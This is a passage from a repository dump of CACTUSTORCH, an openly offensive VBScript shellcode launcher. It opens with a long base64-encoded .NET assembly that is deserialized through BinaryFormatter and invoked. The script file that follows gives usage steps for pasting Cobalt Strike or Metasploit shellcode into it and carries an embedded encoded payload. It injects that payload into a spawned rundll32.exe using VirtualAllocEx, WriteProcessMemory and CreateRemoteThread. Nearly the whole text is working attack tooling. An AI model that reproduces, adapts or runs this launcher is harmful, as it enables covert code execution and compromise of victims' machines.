"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" 65 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" 66 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" 67 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" 68 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu" 69 | s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH" 70 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA" 71 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw" 72 | s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu" 73 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" 74 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u" 75 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5" 76 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR" 77 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA" 78 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y" 79 | s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh" 80 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz" 81 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA" 82 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy" 83 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA" 84 | s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA" 85 | s = s & 
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA" 86 | s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 87 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA" 88 | s = s & "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA" 89 | s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA" 90 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA" 91 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT" 92 | s = s & "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA" 93 | s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME" 94 | s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR" 95 | s = s & "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA" 96 | s = s & "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR" 97 | s = s & "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V" 98 | s = s & "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA" 99 | s = s & "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu" 100 | s = s & "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR" 101 | s = s & "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA" 102 | s = s & "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA" 103 | s = s & "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh" 104 | s = s & "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA" 105 | s = s & "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9" 106 | s = s & 
"AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA" 107 | s = s & "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/" 108 | s = s & "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA" 109 | s = s & "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED" 110 | s = s & "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA" 111 | s = s & "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH" 112 | s = s & "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA" 113 | s = s & "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/" 114 | s = s & "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG" 115 | s = s & "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS" 116 | s = s & "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA" 117 | s = s & "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA" 118 | s = s & "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH" 119 | s = s & "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD" 120 | s = s & "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I" 121 | s = s & "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF" 122 | s = s & "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA" 123 | s = s & "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+" 124 | s = s & "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA" 125 | s = s & "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE" 126 | s = s & "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A" 127 | s = s & 
"CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ" 128 | s = s & "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA" 129 | s = s & "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw" 130 | s = s & "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB" 131 | s = s & "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz" 132 | s = s & "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA" 133 | s = s & "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA" 134 | s = s & "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy" 135 | s = s & "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP" 136 | s = s & "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V" 137 | s = s & "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD" 138 | s = s & "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV" 139 | s = s & "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW" 140 | s = s & "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf" 141 | s = s & "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf" 142 | s = s & "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT" 143 | s = s & "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM" 144 | s = s & "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X" 145 | s = s & "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU" 146 | s = s & "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV" 147 | s = s & "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG" 148 | s = s & 
"QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT" 149 | s = s & "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS" 150 | s = s & "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi" 151 | s = s & "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU" 152 | s = s & "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl" 153 | s = s & "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA" 154 | s = s & "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl" 155 | s = s & "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli" 156 | s = s & "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp" 157 | s = s & "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs" 158 | s = s & "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv" 159 | s = s & "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0" 160 | s = s & "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp" 161 | s = s & "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp" 162 | s = s & "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG" 163 | s = s & "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr" 164 | s = s & "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy" 165 | s = s & "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj" 166 | s = s & "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk" 167 | s = s & "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj" 168 | s = s & "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT" 169 | s = s & 
"ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz" 170 | s = s & "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD" 171 | s = s & "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA" 172 | s = s & "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB" 173 | s = s & "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj" 174 | s = s & "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0" 175 | s = s & "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl" 176 | s = s & "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0" 177 | s = s & "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP" 178 | s = s & "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB" 179 | s = s & "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O" 180 | s = s & "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA" 181 | s = s & "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA" 182 | s = s & "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA" 183 | s = s & "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC" 184 | s = s & "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY" 185 | s = s & "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB" 186 | s = s & "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm" 187 | s = s & "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA" 188 | s = s & "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg" 189 | s = s & "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA" 190 | s = s & 
"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A" 191 | s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA" 192 | s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA" 193 | s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs" 194 | s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA" 195 | s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA" 196 | s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA" 197 | s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu" 198 | s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA" 199 | s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV" 200 | s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA" 201 | s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP" 202 | s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA" 203 | s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw" 204 | s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA" 205 | s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 206 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 207 | s = s & "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 208 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 209 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 210 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 211 | s = s & 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 212 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 213 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 214 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 215 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 216 | s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv" 217 | s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA" 218 | entry_class = "cactusTorch" 219 | 220 | Dim fmt, al, d, o 221 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter") 222 | Set al = CreateObject("System.Collections.ArrayList") 223 | al.Add fmt.SurrogateSelector 224 | 225 | Set d = fmt.Deserialize_2(Base64ToStream(s)) 226 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 227 | o.flame binary,code 228 | End Sub 229 | 230 | SetVersion 231 | On Error Resume Next 232 | Run 233 | If Err.Number <> 0 Then 234 | Debug Err.Description 235 | Err.Clear 236 | End If -------------------------------------------------------------------------------- /CACTUSTORCH.vbs: -------------------------------------------------------------------------------- 1 | ' ( ) ( ) 2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 9 | ' 10 | ' Author: Vincent Yiu (@vysecurity) 11 | ' Credits: 12 | ' - @cn33liz: Inspiration with StarFighter 13 | ' - @ttiraniddo: James Forshaw for DotNet2JScript 14 | ' - @armitagehacker: Raphael 
Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 15 | 16 | ' A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 17 | 18 | ' Usage: 19 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 20 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 21 | ' Run: cat payload.bin | base64 -w 0 22 | ' Copy the base64 encoded payload into the code variable below. 23 | 24 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 25 | Dim binary : binary = "rundll32.exe" 26 | 27 | ' Base64 encoded 32 bit shellcode 28 | Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA" 29 | 30 | ' ---------- DO NOT EDIT BELOW HERE ----------- 31 | 32 | Sub Debug(s) 33 | End Sub 34 | Sub SetVersion 35 | Dim shell 36 | Set shell = CreateObject("WScript.Shell") 37 | Dim ver 38 | ver = "v4.0.30319" 39 | On Error Resume Next 40 | shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\" 41 | If Err.Number <> 0 Then 42 | ver = "v2.0.50727" 43 | Err.Clear 44 | End If 45 | shell.Environment("Process").Item("COMPLUS_Version") = ver 46 | End Sub 47 | Function Base64ToStream(b) 48 | Dim enc, length, ba, transform, ms 49 | Set enc = CreateObject("System.Text.ASCIIEncoding") 50 | length = enc.GetByteCount_2(b) 51 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform") 52 | Set 
